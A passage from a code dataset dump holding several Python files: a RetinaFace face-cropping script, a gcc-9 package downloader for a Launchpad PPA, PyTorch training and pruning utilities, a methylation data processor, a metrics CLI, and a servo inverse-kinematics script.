remove_prefix(state_dict, prefix):\r\n ''' Old style model is stored with all names of parameters sharing common prefix 'module.' '''\r\n print('remove prefix \\'{}\\''.format(prefix))\r\n f = lambda x: x.split(prefix, 1)[-1] if x.startswith(prefix) else x\r\n return {f(key): value for key, value in state_dict.items()}\r\n\r\n\r\ndef load_model(model, pretrained_path, load_to_cpu):\r\n print('Loading pretrained model from {}'.format(pretrained_path))\r\n if load_to_cpu:\r\n pretrained_dict = torch.load(pretrained_path, map_location=lambda storage, loc: storage)\r\n else:\r\n device = torch.cuda.current_device()\r\n pretrained_dict = torch.load(pretrained_path, map_location=lambda storage, loc: storage.cuda(device))\r\n if \"state_dict\" in pretrained_dict.keys():\r\n pretrained_dict = remove_prefix(pretrained_dict['state_dict'], 'module.')\r\n else:\r\n pretrained_dict = remove_prefix(pretrained_dict, 'module.')\r\n check_keys(model, pretrained_dict)\r\n model.load_state_dict(pretrained_dict, strict=False)\r\n return model\r\n\r\nraw_dir = os.path.join(\"data\", \"eval\")\r\ncrop_dir = os.path.join(\"data\", \"eval_crop\")\r\n\r\nif __name__ == '__main__':\r\n torch.set_grad_enabled(False)\r\n cfg = None\r\n if args.network == \"mobile0.25\":\r\n cfg = cfg_mnet\r\n elif args.network == \"resnet50\":\r\n cfg = cfg_re50\r\n # net and model\r\n net = RetinaFace(cfg=cfg, phase = 'test')\r\n net = load_model(net, args.trained_model, args.cpu)\r\n net.eval()\r\n print('Finished loading model!')\r\n print(net)\r\n device = torch.device(\"cpu\" if args.cpu else \"cuda\")\r\n net = net.to(device)\r\n\r\n resize = 1\r\n\r\n # testing begin\r\n for d in tqdm(os.listdir(raw_dir)):\r\n if not os.path.exists(os.path.join(crop_dir, d)):\r\n os.makedirs(os.path.join(crop_dir, d))\r\n for img in tqdm(os.listdir(os.path.join(raw_dir, d)), leave=False):\r\n image_path = os.path.join(raw_dir, d, img)\r\n crop_image_path = os.path.join(crop_dir, d, img)\r\n img_raw = cv2.imread(image_path, cv2.IMREAD_COLOR)\r\n img = np.float32(img_raw)\r\n im_height, im_width, _ = img.shape\r\n scale = torch.Tensor([img.shape[1], img.shape[0], img.shape[1], img.shape[0]])\r\n img -= (104, 117, 123)\r\n img = img.transpose(2, 0, 1)\r\n img = torch.from_numpy(img).unsqueeze(0)\r\n img = img.to(device)\r\n scale = scale.to(device)\r\n\r\n tic = time.time()\r\n loc, conf, landms = net(img) # forward pass\r\n # print('net forward time: {:.4f}'.format(time.time() - tic))\r\n priorbox = PriorBox(cfg, image_size=(im_height, im_width))\r\n priors = priorbox.forward()\r\n priors = priors.to(device)\r\n prior_data = priors.data\r\n boxes = decode(loc.data.squeeze(0), prior_data, cfg['variance'])\r\n boxes = boxes * scale / resize\r\n boxes = boxes.cpu().numpy()\r\n scores = conf.squeeze(0).data.cpu().numpy()[:, 1]\r\n landms = decode_landm(landms.data.squeeze(0), prior_data, cfg['variance'])\r\n scale1 = torch.Tensor([img.shape[3], img.shape[2], img.shape[3], img.shape[2],\r\n img.shape[3], img.shape[2], img.shape[3], img.shape[2],\r\n img.shape[3], img.shape[2]])\r\n scale1 = scale1.to(device)\r\n landms = landms * scale1 / resize\r\n landms = landms.cpu().numpy()\r\n\r\n # ignore low scores\r\n inds = np.where(scores > args.confidence_threshold)[0]\r\n boxes = boxes[inds]\r\n landms = landms[inds]\r\n scores = scores[inds]\r\n\r\n # keep top-K before NMS\r\n order = scores.argsort()[::-1][:args.top_k]\r\n boxes = boxes[order]\r\n landms = landms[order]\r\n scores = scores[order]\r\n\r\n # do NMS\r\n dets = np.hstack((boxes, scores[:, 
np.newaxis])).astype(np.float32, copy=False)\r\n            keep = py_cpu_nms(dets, args.nms_threshold)\r\n            # keep = nms(dets, args.nms_threshold,force_cpu=args.cpu)\r\n            dets = dets[keep, :]\r\n            landms = landms[keep]\r\n\r\n            # keep top-K faster NMS\r\n            dets = dets[:args.keep_top_k, :]\r\n            landms = landms[:args.keep_top_k, :]\r\n\r\n            dets = np.concatenate((dets, landms), axis=1)\r\n\r\n            # show/save image\r\n            for b in dets:\r\n                if b[4] < args.vis_thres:\r\n                    continue\r\n                text = \"{:.4f}\".format(b[4])\r\n                b = list(map(int, b))\r\n                x1, y1, x2, y2 = max(0, b[0]), max(0, b[1]), max(0, b[2]), max(0, b[3])\r\n                w, h = x2 - x1, y2 - y1\r\n                if w <= 10 or h <= 10:\r\n                    continue\r\n                nw, nh = max(w, h), max(w, h)\r\n                x1, y1 = max(0, x1-(nw-w)//2), max(0, y1-(nh-h)//2)\r\n                crop_img = img_raw[y1:y1+nh, x1:x1+nw]\r\n                crop_img = cv2.resize(crop_img, (112, 112), interpolation=cv2.INTER_AREA)\r\n                cv2.imwrite(crop_image_path, crop_img)\r\n                # cv2.imshow(\"Plotted\", crop_img)\r\n                # cv2.waitKey(0)\r\n\r\n","sub_path":"face_detector/crop_dataset.py","file_name":"crop_dataset.py","file_ext":"py","file_size_in_byte":7335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"121739643","text":"import requests\r\nimport os\r\nimport hashlib\r\nimport re\r\nimport sys\r\nimport platform\r\nimport time\r\n\r\nurl ='http://ppa.launchpad.net/ubuntu-toolchain-r/test/ubuntu/pool/main/g/gcc-9/'\r\n\r\n\r\n# download helper\r\ndef downloader(url,filepath):\r\n    start=time.time()\r\n    size=0\r\n    file=requests.get(url,stream=True)\r\n    count=1024\r\n    content_size=int(file.headers['content-length'])\r\n    print('[ URL ]:'+url)\r\n    if file.status_code==200:\r\n        if content_size<1024: # bytes\r\n            print('[File size]:%0.2f byte'%(content_size))\r\n        elif content_size<1024*1024: # KB\r\n            print('[File size]:%0.2f Kb'%(content_size/1024))\r\n            count=2048\r\n        else: # MB\r\n            print('[File size]:%0.2f Mb'%(content_size/1024/1024))\r\n            count=2048\r\n        with open(filepath,'wb+')as f:\r\n            for data in file.iter_content(chunk_size=count):\r\n                f.write(data)\r\n                size+=len(data)\r\n                print('\\r'+'[Progress]:%s%0.2f%%'%('>'*int(size*50/content_size),float(size/content_size*100)),end='')\r\n    end=time.time()\r\n    print('[ Elapsed ]:%0.2f'%(end-start))\r\n\r\n\r\n
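The `downloader` function above reads the Content-Length header before checking the status code, so a 404 response (or a server that omits the header) raises a KeyError. A slightly hardened variant of the same streaming loop is sketched below; what to do on a missing header is my assumption about the script's intent, not part of the original.

```python
# Sketch: a defensive version of the streamed download above. Progress is
# only printed when the total size is known.
import requests

def download(url, filepath, chunk_size=2048):
    resp = requests.get(url, stream=True, timeout=30)
    resp.raise_for_status()                              # fail fast on non-2xx
    total = int(resp.headers.get('content-length', 0))   # 0 = unknown size
    done = 0
    with open(filepath, 'wb') as f:
        for chunk in resp.iter_content(chunk_size=chunk_size):
            f.write(chunk)
            done += len(chunk)
            if total:
                print('\r[Progress]: %5.1f%%' % (100 * done / total), end='')
    print()
```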
if __name__=='__main__':\r\n    # detect the system architecture\r\n    sysarch=platform.machine()\r\n    sysarch=sysarch.lower()\r\n    vermatch=r'href.*?cpp.*?\-doc_.*?ubuntu1~([\d|\.]*?)\_.*?.deb.*?'\r\n    \r\n    if url[len(url)-1]=='/':\r\n        url=url[:-1]\r\n    new_md5=hashlib.md5()\r\n    new_md5.update(url.encode('utf8'))\r\n    urlhash=str(new_md5.hexdigest()) # hash of the URL\r\n    files=os.listdir('.') # file names in the current directory\r\n    print('[Fetching page]')\r\n    fae=False\r\n    for i in range(0,len(files)):\r\n        if files[i][:-4]==urlhash:\r\n            fae=True\r\n            break\r\n    if fae: # page already cached\r\n        print('[Page cached, reading it]')\r\n        f=open(files[i],\"r\")\r\n        strhtml=f.read()\r\n        f.close()\r\n    else:\r\n        strhtml=requests.get(url)\r\n        strhtml=strhtml.text\r\n        # write the page to a cache file\r\n        f=open(urlhash+'.txt','w+')\r\n        f.write(strhtml)\r\n        f.close()\r\n    print('[Page loaded]')\r\n    # read the supported versions\r\n    uvs=re.findall(vermatch,strhtml)\r\n    if not uvs:  # re.findall returns an empty list, never None\r\n        print('!Failed to read version info, check the regex vermatch or the cached page in '+urlhash+'.txt')\r\n        sys.exit()\r\n    print('*'*50)\r\n    for ver in uvs:\r\n        print(ver)\r\n    print('*'*50)\r\n    vercheck=input('*Above are the supported Ubuntu versions, enter the matching version number: ')\r\n    isinarray=False\r\n    for ver in uvs:\r\n        if ver==vercheck:\r\n            isinarray=True\r\n            break\r\n    if not isinarray:\r\n        print('!Unsupported version')\r\n        sys.exit()\r\n    \r\n    archmatch=r'href.*?gcc.*?base.*?ubuntu1~'+vercheck+r'\_([\S]*?)\.deb'\r\n    # read the supported architectures\r\n    uas=re.findall(archmatch,strhtml)\r\n    check=input('*Detected system architecture: '+sysarch+', choose manually? (n/y): ')\r\n    if check!='':\r\n        if check[0]=='y' or check[0]=='Y':\r\n            for arch in uas:\r\n                print(arch)\r\n            archeck=input('*Above are the architectures this PPA supports for Ubuntu-'+vercheck+', enter one: ')\r\n        else:\r\n            archeck=sysarch\r\n    isinarray=False\r\n    for arch in uas:\r\n        if arch==archeck: \r\n            isinarray=True\r\n            break\r\n    if not isinarray:\r\n        print('!Unsupported architecture')\r\n        sys.exit()\r\n\r\n    filematch=r'href.*?\"(.*?ubuntu1~'+vercheck+r'_'+archeck+r'\.deb)\"'\r\n    fname=re.findall(filematch,strhtml) # match the file names\r\n    print('[File name search done, writing them to a file]') \r\n    \r\n    # write the collected file names to a file\r\n    fnamelen=len(fname) # number of files\r\n    filename=urlhash+'_files.txt'\r\n    f=open(filename,'w+')\r\n    f.write('file num:'+str(fnamelen)+'\\n')\r\n    for line in fname:\r\n        f.write(line+'\\n')\r\n    f.close()\r\n    \r\n    print('[File names written to]:'+filename)\r\n    print('[Total: '+str(fnamelen)+' files]')\r\n    \r\n    # start downloading the files by name\r\n    check=input('*Start downloading the files? (n/y): ')\r\n    if check!='':\r\n        if check[0]!='y' and check[0]!='Y':\r\n            sys.exit()\r\n    else:\r\n        sys.exit()\r\n    # create the download directory\r\n    dire=re.search(r'[^/]*$',url) # derive the directory name from the URL\r\n    if dire==None:\r\n        print('!Bad directory name')\r\n        sys.exit()\r\n    dire=str(dire.group())\r\n    \r\n    print('[Download directory]:'+dire)\r\n    isexists=os.path.exists(dire)\r\n    if not isexists:\r\n        os.mkdir(dire)\r\n    dire+='\\\\'\r\n    url+='/'\r\n    for i in range(0,fnamelen):\r\n        print('[Downloading]:'+fname[i])\r\n        downloader(url+fname[i],dire+fname[i])\r\n        print('[Done]\\n[Remaining]:%d/%d'% (fnamelen-i-1,fnamelen))\r\n\r\n\r\n\r\n","sub_path":"get-gcc-9.py","file_name":"get-gcc-9.py","file_ext":"py","file_size_in_byte":4746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"445788639","text":"'''Some helper functions for PyTorch, including:\n    - get_mean_and_std: calculate the mean and std value of dataset.\n    - msr_init: net parameter initialization.\n    - progress_bar: progress bar mimic xlua.progress.\n'''\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport time\nimport math\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.init as init\n\nimport torchvision\nimport torchvision.transforms as transforms\n\nfrom torch.autograd import Variable\n\nimport torch.optim as optim\n\ncriterion = nn.CrossEntropyLoss()\n\ndef get_mean_and_std(dataset):\n    '''Compute the mean and std value of dataset.'''\n    dataloader = torch.utils.data.DataLoader(dataset, batch_size=1, shuffle=True, num_workers=2)\n    mean = torch.zeros(3)\n    std = torch.zeros(3)\n    print('==> Computing mean and std..')\n    for inputs, targets in dataloader:\n        for i in range(3):\n            mean[i] += inputs[:,i,:,:].mean()\n            std[i] += inputs[:,i,:,:].std()\n    mean.div_(len(dataset))\n    std.div_(len(dataset))\n    return mean, std\n\ndef init_params(net):\n    '''Init layer parameters.'''\n    for m in net.modules():\n        if isinstance(m, nn.Conv2d):\n            init.kaiming_normal(m.weight, mode='fan_out')\n            if m.bias:\n                init.constant(m.bias, 0)\n        elif isinstance(m, nn.BatchNorm2d):\n            init.constant(m.weight, 1)\n            init.constant(m.bias, 0)\n        elif isinstance(m, nn.Linear):\n            init.normal(m.weight, std=1e-3)\n            if m.bias:\n                init.constant(m.bias, 0)\n\n\n\ndef format_time(seconds):\n    days = int(seconds / 3600/24)\n    seconds = seconds - days*3600*24\n    hours = int(seconds / 3600)\n    seconds = seconds - hours*3600\n    minutes = int(seconds / 60)\n    seconds = seconds - minutes*60\n    secondsf = int(seconds)\n    seconds = seconds - secondsf\n    millis = int(seconds*1000)\n\n    f = ''\n    i = 1\n    if days > 0:\n        f += str(days) + 'D'\n        i += 1\n    if hours > 0 and i <= 2:\n        f += str(hours) + 'h'\n        i += 1\n    if minutes > 0 and i <= 2:\n        f += 
str(minutes) + 'm'\n i += 1\n if secondsf > 0 and i <= 2:\n f += str(secondsf) + 's'\n i += 1\n if millis > 0 and i <= 2:\n f += str(millis) + 'ms'\n i += 1\n if f == '':\n f = '0ms'\n return f\n\ndef get_data():\n print('==> Preparing data..')\n transform_train = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n ])\n\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n ])\n\n trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform_train)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=100, shuffle=True, num_workers=2)\n\n testset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=transform_test)\n testloader = torch.utils.data.DataLoader(testset, batch_size=100, shuffle=False, num_workers=2)\n\n return trainloader, testloader\n\ndef save_state(model_name, model_weights, acc):\n print('==> Saving model ...')\n state = {\n 'acc': acc,\n 'state_dict': model_weights.state_dict(),\n }\n for key in list(state['state_dict'].keys()):\n if 'module' in key:\n state['state_dict'][key.replace('module.', '')] = \\\n state['state_dict'].pop(key)\n\n torch.save(state, 'saved_models/ckpt'+model_name+'.t7')\n\ndef load_best(model_name, model_wts):\n filename = 'saved_models/ckpt' + model_name + '.t7'\n\n checkpoint = None\n\n if torch.cuda.is_available():\n checkpoint = torch.load(filename)\n else:\n checkpoint = torch.load(filename, map_location=lambda storage, loc: storage)\n\n\n best_acc = checkpoint['acc']\n print(\"Loading checkpoint with best_acc: \", best_acc)\n\n '''\n state_dict = checkpoint['model']\n\n # create new OrderedDict that does not contain `module.`\n from collections import OrderedDict\n new_state_dict = OrderedDict()\n for k, v in state_dict.items():\n name = k[7:] # remove `module.`\n new_state_dict[name] = v\n # load params\n model_wts.load_state_dict(new_state_dict)\n '''\n state_dict = checkpoint['state_dict']\n model_wts.load_state_dict(state_dict)\n\n return model_name, model_wts, best_acc\n\n\ndef finetune(model, model_name, best_acc, finetuning_epochs, train_loader, test_loader, lr):\n optimizer = optim.SGD(model.parameters(), lr=lr, momentum=0.9, weight_decay=5e-4)\n for epoch in range(1, finetuning_epochs):\n train(model, epoch, optimizer, trainloader=train_loader)\n best_acc = test(model_name, model, epoch, test_loader, best_acc)\n return best_acc\n\n# Training\ndef train(model, epoch, optimizer, trainloader):\n #model_name, model = model[0], model[1]\n use_cuda = torch.cuda.is_available()\n\n if use_cuda:\n model.cuda()\n model = torch.nn.DataParallel(model, device_ids=range(torch.cuda.device_count()))\n\n print('\\nEpoch: %d' % epoch)\n\n model.train()\n\n train_loss = 0\n correct = 0\n total = 0\n\n for batch_idx, (inputs, targets) in enumerate(trainloader):\n if use_cuda:\n inputs, targets = inputs.cuda(), targets.cuda()\n\n optimizer.zero_grad()\n\n inputs, targets = Variable(inputs), Variable(targets)\n outputs = model(inputs)\n\n loss = criterion(outputs, targets)\n loss.backward()\n\n optimizer.step()\n\n train_loss += loss.data[0]\n _, predicted = torch.max(outputs.data, 1)\n total += targets.size(0)\n correct += predicted.eq(targets.data).cpu().sum()\n\n acc = 100.*correct/total\n\n print(\" Accuracy: \", acc)\n\n\n\ndef 
test(model_name, model, epoch, testloader, best_acc):\n use_cuda = torch.cuda.is_available()\n\n if use_cuda:\n model.cuda()\n model = torch.nn.DataParallel(model, device_ids=range(torch.cuda.device_count()))\n\n model.eval()\n test_loss = 0\n correct = 0\n total = 0\n\n for batch_idx, (inputs, targets) in enumerate(testloader):\n if use_cuda:\n inputs, targets = inputs.cuda(), targets.cuda()\n inputs, targets = Variable(inputs, volatile=True), Variable(targets)\n outputs = model(inputs)\n loss = criterion(outputs, targets)\n\n test_loss += loss.data[0]\n _, predicted = torch.max(outputs.data, 1)\n total += targets.size(0)\n correct += predicted.eq(targets.data).cpu().sum()\n\n # Save checkpoint.\n acc = 100.*correct/total\n\n if acc > best_acc:\n print('Saving..')\n save_state(model_name, model, acc)\n best_acc = acc\n return best_acc\n\n# deep compression\n\ndef count_params(model):\n total = 0\n for param in model.parameters():\n flat = param.view(param.size(0), -1)\n flat = flat.data.cpu().numpy()\n total = total + np.count_nonzero(flat)\n return total\n\nimport numpy as np\n\ndef calculate_threshold(weights, ratio):\n return np.percentile(np.array(torch.abs(weights).cpu().numpy()), ratio)\n\n\ndef sparsify(model, sparsity_level=50.):\n for name, param in model.named_parameters():\n if 'weight' in name:\n threshold = calculate_threshold(param.data, sparsity_level)\n mask = torch.gt(torch.abs(param.data), threshold).float()\n\n param.data = param.data * mask\n return model\n\ndef argwhere_nonzero(layer, batchnorm=False):\n indices=[]\n # for batchnorms we want to do the opposite\n if batchnorm:\n for idx,w in enumerate(layer):\n if torch.sum(torch.abs(w)).data.cpu().numpy() == 0.:\n indices.append(idx)\n else:\n for idx,w in enumerate(layer):\n if torch.sum(torch.abs(w)).data.cpu().numpy() != 0.:\n indices.append(idx)\n\n return indices\n\n\ndef prune_conv(indices, layer, follow=False):\n # follow tells us whether we need to prune input channels or output channels\n a,b,c,d = layer.weight.data.cpu().numpy().shape\n\n if not follow:\n # prune output channels\n layer.weight.data = torch.from_numpy(layer.weight.data.cpu().numpy()[indices])\n if layer.bias:\n layer.bias.data = torch.from_numpy(layer.bias.data.cpu().numpy()[indices])\n else:\n # prune input channels - so don't touch biases because we're not changing the number of neurons/nodes/output channels\n layer.weight.data = torch.from_numpy(layer.weight.data.cpu().numpy()[:,indices])\n\ndef prune_fc(indices, channel_size, layer, follow_conv=True):\n a,b = layer.weight.data.cpu().numpy().shape\n if follow_conv:\n # if we are following a conv layer we need to expand each index by the size of the plane\n indices = [item for sublist in list((map(lambda i : np.arange((i * channel_size), (i*channel_size+channel_size)), indices))) for item in sublist]\n\n layer.weight.data = torch.from_numpy(layer.weight.data.cpu().numpy()[:,indices])\n\ndef prune_bn(indices, layer):\n layer.weight.data = torch.from_numpy(layer.weight.data.cpu().numpy()[indices])\n layer.bias.data = torch.from_numpy(layer.bias.data.cpu().numpy()[indices])\n\n layer.running_mean = torch.from_numpy(layer.running_mean.cpu().numpy()[indices])\n layer.running_var = torch.from_numpy(layer.running_var.cpu().numpy()[indices])\n\ndef compress_convs(model, compressed):\n\n ls = expand_model(model, [])\n\n channels = []\n nonzeros = []\n skip_connection = []\n\n for l1, l2 in zip(ls, ls[1:]):\n if isinstance(l1, nn.Conv2d):\n\n nonzeros = argwhere_nonzero(l1.weight)\n nonzeros_altered 
= True\n\n            channels.append(len(nonzeros))\n            channel_size = l1.kernel_size[0] * l1.kernel_size[1]\n            prune_conv(nonzeros, l1)\n\n            if isinstance(l2, nn.Conv2d):\n                prune_conv(nonzeros, l2, follow=True)\n            elif isinstance(l2, nn.Linear):\n                prune_fc(nonzeros, channel_size, l2, follow_conv=True)\n            elif isinstance(l2, nn.Sequential):\n                # save for skip connection\n                skip_connection = nonzeros\n\n        elif isinstance(l1, nn.BatchNorm2d):\n            # no need to append to channels since we will already have done it\n            # i.e. num of channels in bn is same as num of channels in last conv layer\n\n            assert nonzeros_altered, \"batch norm layer appeared before a convolutional layer\"\n\n            l1_channels = l1.num_features\n\n            prune_bn(nonzeros, l1)\n\n            if isinstance(l2, nn.Conv2d):\n                if (l2.in_channels < l1_channels) and (len(skip_connection) > 0): # if this is a skip connection:\n                    prune_conv(skip_connection, l2, follow=True)\n                elif l1_channels == l2.in_channels:\n                    prune_conv(nonzeros, l2, follow=True)\n            elif isinstance(l2, nn.Linear):\n                prune_fc(nonzeros, channel_size, l2, follow_conv=True) # TODO fix this please\n\n    print(channels)\n\n    new_model = compressed(channels)\n\n    for original, compressed in zip(expand_model(model, []), expand_model(new_model, [])):\n        print(\"original: \", original)\n        print(\"compressed: \", compressed)\n        print(\"===============\\n\\n\\n\")\n\n        if not isinstance(original, nn.Sequential):\n            compressed.weight.data = original.weight.data\n            if original.bias is not None:\n                compressed.bias.data = original.bias.data\n\n    return new_model\n\ndef expand_model(model, layers=None):\n    # use None instead of a mutable default list, which would be shared\n    # across calls and keep accumulating layers\n    if layers is None:\n        layers = []\n    for layer in model.children():\n        if len(list(layer.children())) > 0:\n            expand_model(layer, layers)\n        else:\n            layers.append(layer)\n    return layers\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"354778461","text":"import pandas as pd\nfrom tqdm import tqdm\n\nfrom .utils import create_path\n\n\nclass DataProcessor:\n    def __init__(self, manifest_type):\n        self.manifest_type = manifest_type\n        self.island_annotations = None\n        self.raw_mynorm = None\n        self.cpg_per_chr = None\n        self.mynorm_std = None\n        self.manifest = None\n        self.mynorm = None\n\n    def set_manifest(self) -> None:\n        if self.manifest_type == \"E\":\n            self.manifest = pd.read_csv(\"resources/EPIC/EPIC.csv\", index_col=0, low_memory=False)\n        else:\n            self.manifest = pd.read_csv(\"resources/450K/450K.csv\", index_col=0, low_memory=False)\n\n    @staticmethod\n    def first_load(mynorm_path: str) -> dict:\n        df = pd.read_csv(mynorm_path, nrows=5)\n\n        dtypes = df.dtypes\n        col_names = dtypes.index\n        types = [i.name for i in dtypes.values]\n        column_types = dict(zip(col_names, types))\n\n        return column_types\n\n    def load_mynorm(self, mynorm_path: str, column_types: dict) -> None:\n        self.raw_mynorm = pd.read_csv(mynorm_path, index_col=0, encoding=\"latin1\", dtype=column_types)\n        self.mynorm = self.raw_mynorm.mean(axis=1).to_frame(name=\"beta-values\")\n        self.mynorm_std = self.raw_mynorm.std(axis=1).to_frame(name=\"beta-values std\")\n\n    def select_cpg(self) -> None:\n        mynorm_cpg = set(self.mynorm.index)\n        overlapped = set.intersection(mynorm_cpg, set(self.manifest.index))\n        self.manifest = self.manifest.loc[overlapped, :]\n\n    def split_per_chromosome(self) -> None:\n        \"\"\"Build a list of Series with CpG MAPINFO, one per chromosome\"\"\"\n        cpg_per_chr = []\n\n        for chr_ in tqdm(self.manifest[\"CHR\"].unique()):\n            cgs = 
self.manifest[self.manifest[\"CHR\"] == chr_][\"MAPINFO\"].astype(int)\n            cpg_per_chr.append(cgs)\n\n        self.cpg_per_chr = cpg_per_chr\n\n    @staticmethod\n    def export_to_csv(df: pd.DataFrame, path) -> None:\n        path = create_path(path, name=\"CpG_in_island.csv\")\n        df.to_csv(path)\n\n    @staticmethod\n    def annotate(df: pd.DataFrame, annotations: pd.DataFrame) -> pd.DataFrame:\n        \"\"\"Function to annotate base CpG and nearby CpG\"\"\"\n        conseq_cpg_annotations = annotations.loc[df.index, :]\n        conseq_cpg_annotations = conseq_cpg_annotations.add_prefix('Nearby CpG: ')\n        df = pd.concat((df, conseq_cpg_annotations), axis=1, sort=False)\n\n        df = df.reset_index()\n        df = df.set_index(\"Base CpG\")\n\n        base_cpg_annotations = annotations.loc[df.index, :]\n        base_cpg_annotations = base_cpg_annotations.add_prefix('Base CpG: ')\n        df = pd.concat((df, base_cpg_annotations), axis=1, sort=False)\n\n        df = df.sort_values(by=[\"Base CpG: CHR\", \"Base CpG: MAPINFO\"])\n        return df\n","sub_path":"source/data_processor.py","file_name":"data_processor.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"439204316","text":"# -*- coding:utf-8 -*-\nimport argparse\nimport urllib.request\nimport json\n\n\nclass DwNode:\n    def __init__(self, hostname):\n        self.hostname = hostname\n\n    def __str__(self):\n        return \"{}\\n\".format(self.hostname)  # a %s placeholder is ignored by str.format and would print literally\n\n    def get_metrics_url(self):\n        return \"\".join([self.hostname, \":\", \"8081\", \"/\", \"metrics\"])\n\n\nclass Metrics:\n    def __init__(self, gauges, counters, histograms, meters, timers):\n        self.gauges = gauges\n        self.counters = counters\n        self.histograms = histograms\n        self.meters = meters\n        self.timers = timers\n\n\ndef parse_cmd_args():\n    \"\"\"\n    Form some positional arguments and optional ones\n    Parse them and form prerequisite objects\n    :return:\n    \"\"\"\n    parser = argparse.ArgumentParser(description=\"Show various outputs in real time from metrics server\")\n    # only required argument\n    parser.add_argument(\"hostname\", help=\"Hostname of the metrics server\")\n\n    # below are all optional\n    parser.add_argument(\"--version\",\n                        action=\"store_true\",\n                        help=\"show version of metrics library\")\n    parser.add_argument(\"--gauges\",\n                        action=\"store_true\",\n                        help=\"show gauges data from metrics\")\n    parser.add_argument(\"--counters\",\n                        action=\"store_true\",\n                        help=\"show counters data from metrics\")\n    parser.add_argument(\"--histograms\",\n                        action=\"store_true\",\n                        help=\"show metrics histograms\")\n    parser.add_argument(\"--meters\",\n                        action=\"store_true\",\n                        help=\"show meters from metrics\")\n    parser.add_argument(\"--timers\",\n                        action=\"store_true\",\n                        help=\"show timers info from metrics\")\n\n    global args\n    args = parser.parse_args()\n\n    global node\n    node = DwNode(args.hostname)\n\n\ndef get_metrics():\n    \"\"\"\n    Just make the actual request and parse json\n    :return:\n    \"\"\"\n    global node\n    metrics_url = node.get_metrics_url()\n    with urllib.request.urlopen(metrics_url) as request:\n        response_json = request.read()\n        response_dict = json.loads(response_json.decode())\n    global metrics\n    metrics = Metrics(gauges=response_dict[\"gauges\"],\n                      timers=response_dict[\"timers\"],\n                      counters=response_dict[\"counters\"],\n                      histograms=response_dict[\"histograms\"],\n                      meters=response_dict[\"meters\"])\n\n\ndef print_gauges():\n    for key in metrics.gauges:\n        print(key, metrics.gauges[key][\"value\"], sep=\" => \")\n\n\ndef print_timers():\n    for timer in metrics.timers:\n        print(timer)\n        print(\"=\" * 50)\n        for key in metrics.timers[timer]:\n            print(key, metrics.timers[timer][key], sep=\" => \")\n\n\ndef print_counters():\n    for counter in metrics.counters:\n        print(counter, metrics.counters[counter][\"count\"], sep=\" => \")\n\n\ndef print_histograms():\n    pass\n\n\ndef print_meters():\n    for meter in metrics.meters:\n        print(meter)\n        print(\"=\" * 50)\n        for meter_type in metrics.meters[meter]:\n            print(meter_type, metrics.meters[meter][meter_type], sep=\" => \")\n        print(\"\\n\")\n\n\ndef pretty_print():\n    if args.gauges:\n        print_gauges()\n    if args.timers:\n        print_timers()\n    if args.counters:\n        print_counters()\n    if args.histograms:\n        pass\n    if args.meters:\n        print_meters()\n\n\nif __name__ == \"__main__\":\n    parse_cmd_args()\n    get_metrics()\n    pretty_print()","sub_path":"dwtop.py","file_name":"dwtop.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"287145007","text":"'''\nCreated on 27 Apr 2018\n\n@author: shashwatjain\n'''\nfrom __future__ import division\nimport time\nfrom InvKin import arm_IK\nimport math\n\n# Import the PCA9685 module.\nimport Adafruit_PCA9685\n\n\n# Uncomment to enable debug output.\n#import logging\n#logging.basicConfig(level=logging.DEBUG)\n\n# Initialise the PCA9685 using the default address (0x40).\npwm = Adafruit_PCA9685.PCA9685()\n\n# Alternatively specify a different address and/or bus:\n#pwm = Adafruit_PCA9685.PCA9685(address=0x41, busnum=2)\n\n# Configure min and max servo pulse lengths\nservo_min = 150  # Min pulse length out of 4096\nservo_max = 600  # Max pulse length out of 4096\n\n# Helper function to make setting a servo pulse width simpler.\ndef set_servo_pulse(channel, pulse):\n    pulse_length = 1000000    # 1,000,000 us per second\n    pulse_length //= 60       # 60 Hz\n    print('{0}us per period'.format(pulse_length))\n    pulse_length //= 4096     # 12 bits of resolution\n    print('{0}us per bit'.format(pulse_length))\n    pulse *= 1000\n    pulse //= pulse_length\n    pwm.set_pwm(channel, 0, pulse)\n\n# Set frequency to 60hz, good for servos.\npwm.set_pwm_freq(60)\n\n\nif __name__ == '__main__':\n    print(\"Enter the coordinates in X,Y,Z format\")\n    X = float(input(\"Enter X--> \"))  # input() returns str in Python 3; the coordinates must be numeric\n    Y = float(input(\"Enter Y--> \"))\n    Z = float(input(\"Enter Z--> \"))\n    theta1, theta2, theta3, alpha2, beta2, alpha3 = arm_IK(X, Y, Z)\n    pulse_range = servo_max - servo_min  # usable pulse span; a name like range would shadow the built-in\n    step = pulse_range/180\n    # map the angle in degrees onto [servo_min, servo_max]; set_pwm expects an integer tick count\n    pwm.set_pwm(0, 0, int(servo_min + step*math.degrees(theta1)))\n    print(math.degrees(theta1))\n    print(math.degrees(theta2))\n    print(math.degrees(theta3))\n#     print('Moving servo on channel 0, press Ctrl-C to quit...')\n#     while True:\n#         # Move servo on channel O between extremes.\n#         pwm.set_pwm(0, 0, servo_min)\n#         time.sleep(1)\n#         pwm.set_pwm(0, 0, servo_max)\n#         time.sleep(1)\n","sub_path":"examples/MoveUsingIK1.py","file_name":"MoveUsingIK1.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
